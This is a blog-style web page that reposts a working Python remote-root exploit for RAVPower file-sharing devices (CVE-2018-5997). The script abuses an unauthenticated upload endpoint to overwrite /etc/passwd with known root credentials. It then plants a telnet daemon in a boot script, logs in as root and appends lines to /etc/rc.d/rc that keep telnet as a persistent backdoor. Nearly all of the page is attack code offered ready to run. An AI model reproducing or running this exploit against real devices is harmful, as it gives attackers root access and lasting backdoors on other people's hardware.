Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863543843

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
"""

# Exploit Title: RAVPower - remote root
# Date: 23/01/2018
# Exploit Authors: Daniele Linguaglossa
# Vendor Homepage: https://www.ravpower.com/
# Software Link: https://www.ravpower.com/
# Version: 2.000.056
# Tested on: OSX
# CVE : CVE-2018-5997

"""

import requests
import time
import telnetlib


PATH_PASSWD = "/etc"
FILE_PASSWD = "passwd"
PATH_VSTFUNC = "/etc/init.d"
FILE_VSTFUNC = "vstfunc"
FILE_RC = "/etc/rc.d/rc"
BACKDOOR_TERM = "export TERM=xterm"
BACKDOOR_TELNET = "/usr/sbin/telnetd &"
BASH_SHEBANG = "#!/bin/sh"
TELNETD = "/usr/sbin/telnetd -p 1111 &"


def upload(host, port, path, name, content):
    user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0"
    path = "/upload.csp?uploadpath=%s&file=1515865637281" % path
    url ="http://{0}:{1}{2}".format(host,port,path)
    files = {'file' : ('%s' % name, content,'application/octet-stream')}
    headers = {
        "user-agent": user_agent
    }
    try:
        requests.post(url,headers=headers,files=files)
        return True
    except:
        return False


# root:admin
tmp_passwd = """root:$1$YBm5LfCo$5OEwLPLUu085z5EoDpQz7/:0:0:root:/data/UsbDisk1/Volume1:/bin/sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
admin:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:15:0:admin:/data/UsbDisk1/Volume1:/bin/sh
mail:*:8:8:mail:/var/mail:/bin/sh
nobody:x:65534:65534:Nobody:/data/UsbDisk1/Volume1:/bin/sh
guest:$1$QlrmwRgO$c0iSI2euV.U1Wx6yBkDBI.:512:0:guest:/data/UsbDisk1/Volume1/Share:/bin/sh-new
"""

tmp_vstfunc = """
export PATH=/bin:/sbin:/usr/bin:/usr/sbin
# A function to stop a program.
killproc() {
	local base=${1##*/}
        local pid=
        pid=`pidof $base`
	local i
        if [ -n "$pid" ]; then
		for i in $pid ; do
			kill -KILL $i > /dev/null 2>&1
		done
        fi
    	rm -f /var/run/$base.pid
    	return 0
}
# A function to find the pid of a program.
pidofproc() {
	local base=${1##*/}
	#First try "/var/run/*.pid" files
	if [ -f "/var/run/$base.pid" ]; then
	        local line p pid=
		read line < /var/run/$base.pid
		for p in $line ; do
		       [ -z "$p" -a -d "/proc/$p" ] && pid="$pid $p"
		done
	else
		pid=`pidof $1 || pidof $base`
	fi
	if [ -n "$pid" ]; then
                echo $pid
                return 0
        fi
	return 1
}
# Check if $pid (could be plural) are running
# Return : 0 run
#          1 stop
checkpid() {
	local i
	for i in $* ; do
		if [ -d "/proc/$i" ]; then
			 return 0
		fi
	done
	return 1
}
# Check disk exist
checkdisk() {
        return $?
}
# save pid and log function
savesc() {
	local i=0
    if [ -n "$3" ]; then
        touch /var/run/$3.pid
    fi
    return $?
}

# A function check start of a program.
# return: 1  not exist
#         0  exist
checkonly() {
        local prgname=${1##*/}
        local pid=
        if [ -f "/var/run/$prgname.pid" ]; then
            pid=`pidof $prgname`
            if [ -n "$pid" ]; then
                return 0
            fi
            return 1
        else
            pid=`pidof $prgname`
            if [ -n "$pid" ]; then
                if sleep 1 && checkpid $pid && sleep 1 && checkpid $pid && sleep 2 && checkpid $pid ; then
                    return 2
                fi
            fi
            return 2
        fi

}
# A function save etc to mtd.
# return: 1 failure
#         0 success
saveetc() {
        local ret=0

	/usr/sbin/etc_tools t > /dev/null 2>&1
	let ret=ret+$?
#	ret=$[$ret + $?]
	/usr/sbin/etc_tools p > /dev/null 2>&1
	let ret=ret+$?
#	ret=$[$ret + $?]

	return $ret
}
# A function resume mtd to etc.
# return: 1 failure
#         0 success
resumeetc() {
        local ret=0

	/usr/sbin/etc_tools b > /dev/null 2>&1
	let ret=ret+$?
#	ret=$[$ret + $?]
	/usr/sbin/etc_tools u > /dev/null 2>&1
	let ret=ret+$?
#	ret=$[$ret + $?]

	return $ret
}

# Create a lock for /var/lock
AppScriptLock() {
	if [ -f /var/lock/$1.pid ]; then
		return 0
	else
		touch /var/lock/$1.pid
		return 1
	fi
}

# Check a lock for /var/lock
AppScriptChkLock() {
	if [ -f /var/lock/$1.pid ]; then
		return 1
	else
		return 0
	fi
}

# Delete a lock for /var/lock
AppScriptUnlock() {
	if [ -f /var/lock/$1.pid ]; then
		rm -rf /var/lock/$1.pid
	fi
	return 1
}

DISKPATH="/data/UsbDisk1/Volume1/.vst/upgrade"
ETCPATH="/boot/tmp"
ETCBKPATH="/boot/tmp/etcbackup"
DISKETCFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etc.tar"
DIDKETCBKFILE="/data/UsbDisk1/Volume1/.vst/upgrade/etcbackup.tar.gz"
ETCFILE="/boot/tmp/etc.tar"
ETCBKFILETAR="/boot/tmp/etcbackup.tar"
ETCBKFILE="/boot/tmp/etcbackup.tar.gz"
FILELIST="hostname passwd shadow samba/smbpasswd fileserv/lighttpd.user dropbox baidu"
FILELIST1="hostname"
backup_etc() {
	rm $ETCBKFILETAR -rf
        rm $ETCBKFILE -rf
        rm $ETCBKPATH -rf

        #	if [ ! -e $DISKPATH ];then
         #       	mkdir -p -m 755 $DISKPATH
        #	fi
		if [ ! -e $ETCBKPATH ]; then
			mkdir -p -m 755 $ETCBKPATH
		fi
if [ -z $1 ]; then
	FILELISTALL=$FILELIST
else
	if [ $1 == "resume" ]; then
		FILELISTALL=$FILELIST1
	fi
fi
		for f in $FILELISTALL
                do
                        if [ -d /etc/$f ]; then
                                cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
                        else
                                if [ "$f" == "samba/smbpasswd" ]; then
                                        if [ ! -e $ETCBKPATH/samba ]; then
                                                mkdir -p $ETCBKPATH/samba
                                        fi
                                        cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
                                elif [ "$f" == "fileserv/lighttpd.user" ]; then
                                        if [ ! -e $ETCBKPATH/fileserv ]; then
                                                mkdir -p $ETCBKPATH/fileserv
                                        fi
                                        cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
                                elif [ "$f" == "serversman/cloud.conf" ]; then
                                        if [ ! -f /etc/$f ]; then
                                                continue
                                        fi
                                        if [ ! -e $ETCBKPATH/serversman ]; then
                                                mkdir -p $ETCBKPATH/serversman
                                        fi
                                        cp -rf /etc/$f $ETCBKPATH/$f > /dev/null 2>&1
                                else
                                	cp -rf /etc/$f $ETCBKPATH > /dev/null 2>&1
				fi
                        fi
                done
		tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
		gzip $ETCBKFILETAR
		if [ -f $ETCBKFILE ]; then
			cp -rf $ETCBKFILE $DIDKETCBKFILE
		fi
}


backup_etc_telnet() {
	rm $ETCBKFILETAR -rf
        rm $ETCBKFILE -rf
        rm $ETCBKPATH -rf

        #	if [ ! -e $DISKPATH ];then
         #       	mkdir -p -m 755 $DISKPATH
        #	fi
		if [ ! -e $ETCBKPATH ]; then
			mkdir -p -m 755 $ETCBKPATH
		fi
if [ -z $1 ]; then
	FILELISTALL=$FILELIST
else
	if [ $1 == "resume" ]; then
		FILELISTALL=$FILELIST1
	fi
fi
		touch $ETCBKPATH/telnetflag
		tar cvf $ETCBKFILETAR $ETCBKPATH > /dev/null 2>&1
		gzip $ETCBKFILETAR
		if [ -f $ETCBKFILE ]; then
			cp -rf $ETCBKFILE $DIDKETCBKFILE
		fi
}









restore_etc() {
		if [ -f $ETCBKFILE ]; then
			gunzip $ETCBKFILE
			tar xvf $ETCBKFILETAR -C / > /dev/null 2>&1
			for f in $FILELIST
			do
                        	if [ -d /etc/$f ]; then
					echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
                                	#cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
                                	cp -rf $ETCBKPATH/$f /etc > /dev/null 2>&1
                        	else
                                	if [ "$f" == "samba/smbpasswd" ]; then
						echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
                                        	cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
                                	elif [ "$f" == "fileserv/lighttpd.user" ]; then
						echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
                                        	cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
                                        elif [ "$f" == "serversman/cloud.conf" ]; then
                                                if [ ! -f $ETCBKPATH/$f ]; then
                                                        continue
                                                fi
                                                echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
                                                cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
                                	else
						echo cp -rf $ETCBKPATH/$f /etc/$f >> /tmp/restore_etc
						cp -rf $ETCBKPATH/$f /etc/$f > /dev/null 2>&1
					fi
				fi
			done
			if [ -f $ETCBKPATH/telnetflag ]; then
				touch /etc/telnetflag
			fi
		fi
}

# A function check usb flag
# return: 0 service start
#         1 service stop
check_usb_flag() {
        local ret=0

        if [ -e "/proc/usbwrite" ];then
                ret=`cat /proc/usbwrite`
        fi

        return $ret
}

###########################################################################
#
# LED operations
#
###########################################################################
led_wink_start() {
	LED=`cat /proc/vsled`
	if [ $LED -eq 3 ]; then
		pioctl wifi 2
	fi
}
led_wink_stop() {
	LED=`cat /proc/vsled`
	if [ $LED -eq 2 ]; then
		pioctl wifi 3
	fi
}
led_wink_chk() {
	LED=`cat /proc/vsled`
	if [ $LED -eq 2 ]; then
		return 1
	else
		return 0
	fi
}

###########################################################################
#
# Flag operation
#
###########################################################################
flagctl_get() {
	if [ -e /dev/sda ]; then
		trynum=0
		while [ $trynum -lt 3 ]; do
			retval=`/usr/sbin/flagctl disk get $1`
			if [ ! -z $retval ]; then
				return $retval
			fi
			let trynum=trynum+1
#			trynum=$[$trynum+1]
			sleep 1
		done
	fi
}

flagctl_set() {
	if [ -e /dev/sda ]; then
		trynum=0
		while [ $trynum -lt 3 ]; do
			/usr/sbin/flagctl disk set $1 $2
			flagctl_get $1
			if [ "$?" -eq "$2" ]; then
				sync
				return 1
			fi
			let trynum=trynum+1
#			trynum=$[$trynum+1]
			sleep 1
		done
	fi
	return 0
}

###########################################################################
#
# string function
#
###########################################################################
str_func_strstr () {
	if [ ${#2} -eq 0 ];then
		echo "$1"
		return 0
	fi
	case "$1" in
		*$2*)
			return 1
			;;
		*)
			return 0
			;;
	esac
}

dev_test_host() {
	nordev=`echo $1 | cut -c -3`
	s_str=`ls -l /sys/block/$nordev/device`
	str_func_strstr "$s_str" "host0"
	if [ $? -eq 1 ]; then
		return 1
	fi
	return 0;
}

dev_test_usb() {
        nordev=`echo $1 | cut -c -3`
        s_str=`ls -l /sys/block/$nordev/device`
        str_func_strstr "$s_str" "usb"
        if [ $? -eq 1 ]; then
                return 1
        fi
        return 0;
}

###########################################################################
#
# Permission check functions
#
###########################################################################
# $1: device name
# $2: host/usb
# $3: if recursive, 1: enable, 0: disable
perm_change_start() {
	permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
	if [ ! -z $permpid ]; then
		return 1;
	else
		/usr/sbin/permchange $1 $2 $3 &
	fi
}

# $1: device name
# $2: if recursive, 1: enable, 0: disable
perm_chk_start() {
	dev_test_host $1
	if [ $? -eq 1 ]; then
		perm_change_start $1 host $2
	else
		perm_change_start $1 usb $2
	fi
}

perm_chk_stop() {
	permpid=`ps | grep "/usr/sbin/permchange $1" | cut -d' ' -f2`
	if [ ! -z $permpid ]; then
		for ppid in $permpid ; do
			kill -9 $ppid > /dev/null 2>&1
		done
	fi
}

###########################################################################
# Time function
###########################################################################
timedate_settosys() {
	if [ -e /etc/timedate ]; then
        	TIMESET=`cat /etc/timedate`
        	date -s $TIMESET
	fi
}

timedate_save() {
	date '+%Y.%m.%d-%H:%M:%S' > /etc/timedate
}
"""
print "RAVPower Remote root (0day) - By dzonerzy & r3dx0f\n\n"
host = raw_input("Insert Ravpower IP: ")
print "[*] Step 1 -> pwning /etc/passwd"
if not upload(host, 80,PATH_PASSWD,FILE_PASSWD,tmp_passwd):
    print "[-] Filed to pwn /etc/passwd maybe fixed?"
    exit(0)
print "[*] Step 2 -> pwning /etc/init.d/vstfunc"
if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+TELNETD+"\n"+tmp_vstfunc):
    print "[-] Filed to pwn /etc/init.d/vstfunc maybe fixed?"
    exit(0)
t = None
print "[*] Step 3 -> Try to remove or insert SD Card or just wait for something happen (something must happen!)"
while True:
    try:
        print "[*] Step 3-1 -> Trying to telnet..."
        t = telnetlib.Telnet(host, port=1111)
        break
    except:
        time.sleep(5)
t.read_until(": ")
t.write("root\n")
t.read_until(": ")
t.write("admin\n")
t.read_until("# ")
print "[*] Step 4 -> pwning /etc/rc.d/rc"
t.write("echo '%s' >> %s\n" % (BACKDOOR_TERM, FILE_RC))
t.read_until("# ")
t.write("echo '%s' >> %s\n" % (BACKDOOR_TELNET, FILE_RC))
t.read_until("# ")
print "[*] Step 4-1 -> pwned!"
print "[*] Step 5 -> Saving settings"
t.write("/usr/sbin/etc_tools p\n")
t.read_until("# ")
print "[*] Step 5-1 -> Done!"
print "[*] Step 6 -> Starting telnetd"
t.write("/usr/sbin/telnetd &\n")
t.read_until("# ")
print "[*] Step 6-1 -> Done!"
print "[*] Step 7 -> Killing old telnet"
t.write("ps aux   |grep 1111  | awk '{print $2}' | xargs kill -9\n")
t.read_until("# ")
print "[*] Step 7-1 -> Done!"
print "[*] Step 8 -> Restoring vstfunc"
if not upload(host, 80,PATH_VSTFUNC,FILE_VSTFUNC,BASH_SHEBANG+"\n"+tmp_vstfunc):
    print "[-] Filed to pwn /etc/init.d/vstfunc fixed?"
    exit(0)
print "[*] Step 8-1 -> Done!"
print "[!] PWNAGE COMPLETED! connect with root:admin"